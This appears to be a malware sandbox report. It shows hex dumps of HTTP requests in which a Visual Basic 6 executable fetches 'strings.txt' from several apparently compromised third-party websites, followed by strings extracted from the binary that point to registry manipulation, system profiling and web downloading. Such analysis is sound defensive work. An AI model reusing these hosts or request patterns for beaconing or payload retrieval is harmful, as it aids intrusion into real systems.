0x00000060 (00096)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000070 (00112)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000080 (00128)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x00000090 (00144)   6f73743a 20777777 2e76756c 63616e75   ost: www.vulcanu
0x000000a0 (00160)   73616c75 6d6e692e 6e65740d 0a436163   salumni.net..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 0d0a6361 6368650d   ache......cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f706f72 74616c2f 61637469   GET /portal/acti
0x00000010 (00016)   6f6e732f 61646d69 6e2f7065 726d2f2e   ons/admin/perm/.
0x00000020 (00032)   2e2e2f73 7472696e 67732e74 78742048   ../strings.txt H
0x00000030 (00048)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000040 (00064)   656e743a 20557365 722d4167 656e743a   ent: User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x00000060 (00096)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000070 (00112)   5736343b 2072763a 31302e30 2e322920   W64; rv:10.0.2) 
0x00000080 (00128)   4765636b 6f2f3230 31303031 30312046   Gecko/20100101 F
0x00000090 (00144)   69726566 6f782f31 302e302e 320d0a48   irefox/10.0.2..H
0x000000a0 (00160)   6f73743a 20777777 2e706362 6f6e746f   ost: www.pcbonto
0x000000b0 (00176)   2e68750d 0a436163 68652d43 6f6e7472   .hu..Cache-Contr
0x000000c0 (00192)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f7e6170 706d6174 682f7465   GET /~appmath/te
0x00000010 (00016)   73742f62 62732f73 7472696e 67732e74   st/bbs/strings.t
0x00000020 (00032)   78742048 5454502f 312e310d 0a557365   xt HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 20557365 722d4167   r-Agent: User-Ag
0x00000040 (00064)   656e743a 204d6f7a 696c6c61 2f352e30   ent: Mozilla/5.0
0x00000050 (00080)   20285769 6e646f77 73204e54 20362e31    (Windows NT 6.1
0x00000060 (00096)   3b20574f 5736343b 2072763a 31302e30   ; WOW64; rv:10.0
0x00000070 (00112)   2e322920 4765636b 6f2f3230 31303031   .2) Gecko/201001
0x00000080 (00128)   30312046 69726566 6f782f31 302e302e   01 Firefox/10.0.
0x00000090 (00144)   320d0a48 6f73743a 20646173 616e2e73   2..Host: dasan.s
0x000000a0 (00160)   656a6f6e 672e6163 2e6b720d 0a436163   ejong.ac.kr..Cac
0x000000b0 (00176)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000c0 (00192)   61636865 0d0a0d0a 61636865 0d0a0d0a   ache....ache....
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f657665 6e746269 6c646572   GET /eventbilder
0x00000010 (00016)   2f67726f 73732f2e 2e2e2f73 7472696e   /gross/.../strin
0x00000020 (00032)   67732e74 78742048 5454502f 312e310d   gs.txt HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20557365   .User-Agent: Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f352e30 20285769 6e646f77 73204e54   /5.0 (Windows NT
0x00000060 (00096)   20362e31 3b20574f 5736343b 2072763a    6.1; WOW64; rv:
0x00000070 (00112)   31302e30 2e322920 4765636b 6f2f3230   10.0.2) Gecko/20
0x00000080 (00128)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000090 (00144)   302e302e 320d0a48 6f73743a 20777777   0.0.2..Host: www
0x000000a0 (00160)   2e756e73 65722d6d 69747465 6c686573   .unser-mittelhes
0x000000b0 (00176)   73656e2e 64650d0a 43616368 652d436f   sen.de..Cache-Co
0x000000c0 (00192)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f636163 68652f66 6f72756d   GET /cache/forum
0x00000010 (00016)   732f7374 72696e67 732e7478 74204854   s/strings.txt HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 55736572 2d416765 6e743a20   nt: User-Agent: 
0x00000040 (00064)   4d6f7a69 6c6c612f 352e3020 2857696e   Mozilla/5.0 (Win
0x00000050 (00080)   646f7773 204e5420 362e313b 20574f57   dows NT 6.1; WOW
0x00000060 (00096)   36343b20 72763a31 302e302e 32292047   64; rv:10.0.2) G
0x00000070 (00112)   65636b6f 2f323031 30303130 31204669   ecko/20100101 Fi
0x00000080 (00128)   7265666f 782f3130 2e302e32 0d0a486f   refox/10.0.2..Ho
0x00000090 (00144)   73743a20 6765746d 6f726573 69746574   st: getmoresitet
0x000000a0 (00160)   72616666 69632e63 6f6d0d0a 43616368   raffic.com..Cach
0x000000b0 (00176)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x000000c0 (00192)   6368650d 0a0d0a6e 6f2d6361 6368650d   che....no-cache.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f626273 2f69636f 6e2f7072   GET /bbs/icon/pr
0x00000010 (00016)   69766174 655f6963 6f6e2f73 7472696e   ivate_icon/strin
0x00000020 (00032)   67732e74 78742048 5454502f 312e310d   gs.txt HTTP/1.1.
0x00000030 (00048)   0a557365 722d4167 656e743a 20557365   .User-Agent: Use
0x00000040 (00064)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000050 (00080)   2f352e30 20285769 6e646f77 73204e54   /5.0 (Windows NT
0x00000060 (00096)   20362e31 3b20574f 5736343b 2072763a    6.1; WOW64; rv:
0x00000070 (00112)   31302e30 2e322920 4765636b 6f2f3230   10.0.2) Gecko/20
0x00000080 (00128)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000090 (00144)   302e302e 320d0a48 6f73743a 2063706c   0.0.2..Host: cpl
0x000000a0 (00160)   2e796f6e 7365692e 61632e6b 720d0a43   .yonsei.ac.kr..C
0x000000b0 (00176)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000c0 (00192)   2d636163 68650d0a 0d0a6361 6368650d   -cache....cache.
0x000000d0 (00208)   0a0d0a                                ...


Strings
.|..
6CP]jw..

, , 
040904B0
1.00
9.64;
9.74;
ARBrBtB
 -c 
CompanyName
FileVersion
InternalName
OriginalFilename
POST
ProductName
ProductVersion
qsxnxy
rwpxvu
sony
StringFileInfo
svyzrx.exe
Translation
VarFileInfo
VS_VERSION_INFO
Xjs2
! ,$&&'
&*$#$$#$*
.111,,,@Tf
2~hbrq_^P3-.
4bbbUTK
~||{4ncTK
4TTTTTAWK-
6OUyt5jo
78;4O`
8877666.,,,&&&1TU
9~4tkWWj
999877766mv.,0A@UTTTU
a0jxvr
_adj_fdiv_m16i
_adj_fdiv_m32
_adj_fdiv_m32i
_adj_fdiv_m64
_adj_fdiv_r
_adj_fdivr_m16i
_adj_fdivr_m32
_adj_fdivr_m32i
_adj_fdivr_m64
_adj_fpatan
_adj_fprem
_adj_fprem1
_adj_fptan
advapi32.dll
AH[qzz
AIH$+#
Aivve0y
Akf6ju
_allmul
Bfgk3wt
c78ln8m
C:\Arquivos de programas\Microsoft Visual Studio\VB98\VB6.OLB
Checks for subkeys in some key...
Checks if given binary data is in valid hex format (used for writting binary)
Checks if some key exists...
Checks if some value exists in registry
_CIatan
_CIcos
_CIexp
_CIlog
_CIsin
_CIsqrt
_CItan
CloseHandle
CMGGPc
Converts binary data into string...
Converts hex (string) into it's binary value...
Cq6_Timer
CreateMutexA
Creates key in registry...
Ctzca2
C:\WINDOWS\system32\msvbvm60.dll\3
`.data
Dcnxkg2
DDD.;;;11ATW
Ddi9nk
Deletes key from registry...
Deletes value from registry...
D]h@MMM)MMM
DISKSPACEFREE
DllFunctionCall
Ds2yxgij
Dxnll2kn
Dxnssr2t
e80u76
eC8>=Pb
En6ans
Enabled
Enk9fuz
Enumerates all values from specified key...
Enumerates subkeys of some key...
EnumMonitorsA
EnumThreadWindows
EVENT_SINK_AddRef
EVENT_SINK_GetIDsOfNames
EVENT_SINK_Invoke
EVENT_SINK_QueryInterface
EVENT_SINK_Release
Exports contents of some key (and it's subkeys) to .reg file...
ezst^(a6@@j
FD~>f;
FFEEEDD
ffffffff
ffffffffffff`
FindWindowA
Fk5ccvoc
Fkubun4c
GetComputerNameA
GetCurrentThreadId
GetDiskFreeSpaceA
GetDriveTypeA
GetKeyboardType
GetLogicalDriveStringsA
GetParent
GetSystemDirectoryA
GetSystemInfo
GetTempPathA
GetUserNameA
GetVersionExA
GetVolumeInformationA
GetWindow
GetWindowLongA
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
/GGGHITf
GlobalMemoryStatus
gQccUN
Gqdzxd4
gRa``]]z
gwwwwwwwwwwww`wwww
HttpAddRequestHeadersA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
Huawg6f
I5jlhtbx
Ikx5kq
Imports .reg file into registry...
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Interval
Ioicp9b
.:;;;;ITf
} j0h\
}#j0h 
j25mp2u
j3j01d7
J3qmfvw
J3xnfdx
Jbgjhm7
}#jDh\
} j<h\
}#jPh8
} jTh8
Jxf3vy
} jXh\
}#jXh8
k3w48gg4
k7/4/;PT
Kay5pku
kernel32
KillTimer
Kqkerd6c
L5'?)"""#
L5'%""#"$
Let/Get. Should key will be created if no exists (when writting data to registry)
lllkkkjj/bbQQTV
Lpfrk7
l$$PUV
L$ PUV
LRI?9\
lw4u26
lz32.dll
LZClose
LZCopy
LZOpenFileA
m\.1,,,,,2TW
Mimbo5h
mmdBEO]_
MMM3MMM
MMM7MMM
MMM9MMMxMMM
MMMAMMMNMMMKMMMFMMM@MMM7MMM,MMM!MMM
MMMBMMM
MMMdMMM"MMM
MMMdMMM(MMM
MMMFMMM
MMMJMMM
MMMjMMM>MMM*MMM
MMMjMMMXMMMLMMMAMMM4MMM%MMM
MMMkMMMXMMMLMMMBMMM2MMM
MMMlMMM'MMM
MMM^MMM
MMM=MMM
MMM:MMM
MMM?MMM
MMM	MMM
MMM|MMM4MMM
MMMmMMM'MMM
MMMnMMM(MMM
MMMQMMM
MMMrMMMaMMMQMMMDMMM9MMM,MMM
MMMrMMMKMMM
MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM
MMMSMMM
MMMsMMM+MMM	MMM
MMMtMMM+MMM	MMM
MMMWMMM
MMMYMMM
MMMyMMMfMMMVMMMKMMM@MMM2MMM%MMM
MMMyMMM/MMM
MMMzMMMKMMM
MSVBVM60.DLL
NKf3mr
nLLLLZk7/5--Pb
nuk{safe4.
n~~~~~~~~v
n~~~~~~~~~~~~v
n~~~~~~~~~~~~w`
n~~~~~~~~~~~~w`w
nwwwwwwww`ww
n~~~~~~~~~~~~w`x
nzqrxp
oaaaa_ep
Obpfw7
OFFEEEDDDD.111111RU
Output
Ozk8wz
ozsqqs
p7ki27d
p]f;\$
pn~~~~
Pni5rni
~~~p~p
Pu7gwl
Q6hktx
/QGGGRT
qj8311g
QT_^]3
Qwcttn5
r8nqnq0
Reads data of binary type...
Reads data of dword type...
Reads data of string type...
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
Resiax6
Ro```]]
RtlMoveMemory
Ru9kwpx
rX+%"/
rZ8oWFFWwwvvC:QQQRa'
SerialNumber
SetTimer
shell32.dll
SHGetPathFromIDListA
SHGetSpecialFolderLocation
ShowWindow
si4s82
STKIT432.DLL
Sty8ki
Sxgnys8
sYR|nyywwx
Ta8fwwqj
!This program cannot be run in DOS mode.
tnnTTi
Toei4ii
toobRTi
~TQWhd
^}}|tt
|tyg,1
Ucef7bn
user32
user32.dll
uspoxz
UTlZMSK
uuu4nncTK
Uyt5jo
Uyt5jo_Timer
Uywl1s
~~~~~~~~~~~~v
v46txa2
VB5!6&*
VBA6.DLL
__vbaAryConstruct2
__vbaAryCopy
__vbaAryDestruct
__vbaAryLock
__vbaAryMove
__vbaAryUnlock
__vbaAryVar
__vbaBoolVarNull
__vbaChkstk
__vbaEnd
__vbaErase
__vbaErrorOverflow
__vbaExceptHandler
__vbaExitProc
__vbaFileClose
__vbaFileOpen
__vbaFixstrConstruct
__vbaFPException
__vbaFpI2
__vbaFpI4
__vbaFPInt
__vbaFpR8
__vbaFreeObj
__vbaFreeObjList
__vbaFreeStr
__vbaFreeStrList
__vbaFreeVar
__vbaFreeVarList
__vbaGenerateBoundsError
__vbaGet3
__vbaGetOwner3
__vbaHresultCheckObj
__vbaI2I4
__vbaI2Var
__vbaI4Var
__vbaInStr
__vbaInStrVar
__vbaLateMemCall
__vbaLbound
__vbaLenBstr
__vbaLenBstrB
__vbaLsetFixstr
__vbaNew
__vbaNew2
__vbaObjSet
__vbaObjSetAddref
__vbaObjVar
__vbaOnError
__vbaPrintFile
__vbaPut3
__vbaPutOwner3
__vbaR8IntI2
__vbaR8IntI4
__vbaR8Str
__vbaRaiseEvent
__vbaRecAnsiToUni
__vbaRecUniToAnsi
__vbaRedim
__vbaRedimPreserve
__vbaSetSystemError
__vbaStr2Vec
__vbaStrCat
__vbaStrCmp
__vbaStrCopy
__vbaStrErrVarCopy
__vbaStrI2
__vbaStrI4
__vbaStrMove
__vbaStrToAnsi
__vbaStrToUnicode
__vbaStrVarCopy
__vbaStrVarMove
__vbaStrVarVal
__vbaUbound
__vbaUI1I2
__vbaUI1I4
__vbaVar2Vec
__vbaVarAdd
__vbaVarAnd
__vbaVarCat
__vbaVarCmpEq
__vbaVarCmpNe
__vbaVarCopy
__vbaVarDup
__vbaVarForInit
__vbaVarForNext
__vbaVarInt
__vbaVarMove
__vbaVarMul
__vbaVarOr
__vbaVarSub
__vbaVarTstEq
__vbaVarTstGt
__vbaVarTstNe
Vevhy2fh
~vfffffff~~~v
V`mdRQJ"& 
Vs3calw
vtvswy
~~~~~~~w`
W1aivv
w4j422j
WaitForSingleObject
WFFFFW,)---<^
wininet.dll
winspool.drv
Wkbk6df
Wooi8i
wqbsg8s
w,)-**>R
Writes data of binary type...
Writes data of dword type...
Writes data of string type...
wuy52x4
~~~~~~~w`w
^@WWWW
wwwwwwwww
wwwwwwwwww
Wzlorh5n
XL\[FGE
xlllkkkjj
XRG???
Xrk3xj
Y3+)"""#
Y4mmze
YRIPPPF
Yuhold7
~~||{yy4naTV
||{yywuuuuu4oooTV
{yywwu
Zm4zfc
z>]N?@5
Zombie_GetTypeInfo
Zombie_GetTypeInfoCount
zpnyrt
z_____/VK<-
ZZZNN/HHHHJTW
][[[ZZZNNOO/HH::;UU